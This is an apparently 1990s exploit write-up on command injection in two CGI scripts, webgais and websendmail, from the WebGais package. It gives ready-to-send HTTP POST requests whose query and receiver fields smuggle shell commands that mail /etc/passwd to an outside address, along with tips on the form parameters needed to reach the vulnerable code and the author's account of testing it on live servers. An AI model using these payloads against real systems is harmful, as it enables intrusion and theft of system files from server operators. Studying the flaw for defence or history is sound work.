WebGais is an interface to the GAIS search tool. It installs a few
programs in /cgi-bin. The main utility is called "webgais" and does the
actual interfacing with the search tool.

It reads the query from a user form, and then runs the GAIS search engine
for that query. The author tried to protect the program by
using single quotes around the query when he passed it to a "system"
command. But he forgot one VERY important thing: to strip single quotes
from the query (this was done in Glimpse).
So, if we send a query like:

query=';mail+foo@somewhere.net</etc/passwd;echo'&.....

we will trick the "protection" system.

The only problem here is that you have to provide a certain combination of
input parameters, to reach the vulnerable line in the script. It took me
about half an hour to get those parameters right.

I also had to comment some code from the script to bypass some error
messages, because I do not have the GAIS search tool installed, I only
have the WEBGais interface. Of course, you won't have to modify the script
at all. It should work just fine as it is.
So here's how I exploited this:

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

... and it worked. But to make it work for your system too, you'll have to
add other parameters, like idx_dir and data_type who are required by the
script in its original version. Just make a normal query to your WebGais
server and see what all the parameters are. But remember to use "output" and
"domain" as specified in my exploit. Otherwise you will end up in some
other place of the script and nothing will happen.

------------------------------------------------------------------------------

Websendmail is a cgi-bin that comes with the WEBgais package, which is
an interface to the GAIS search tool.
It is a PERL script that reads input from a form and sends e-mail to the
specified destination.
The version I am referring to is 1.0. It was released in 1995 but it is
still used (I've just tested it :) ).

As many other cgi-bin programs, this one does not check for special
characters in the user input.

Here's what it does:
(...)
$cmd="| $MAILBIN $VAR_receiver";
open (PIPEOUT, $cmd);

$VAR_receiver is read from the form. The script also does a little parsing
on the string to "un-webify" it (converts pluses to spaces and %xx
characters to their real value).
So if we set $VAR_receiver to
';mail+your_address\@somewhere.org</etc/passwd;'
it will do the job.

Now for the exploit:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a

Don't worry if the server displays an error message. The password file is
on the way :).

You can use anything for the "sender", "rtnaddr", "subject" and "content",
just make sure they're there, the script checks for them.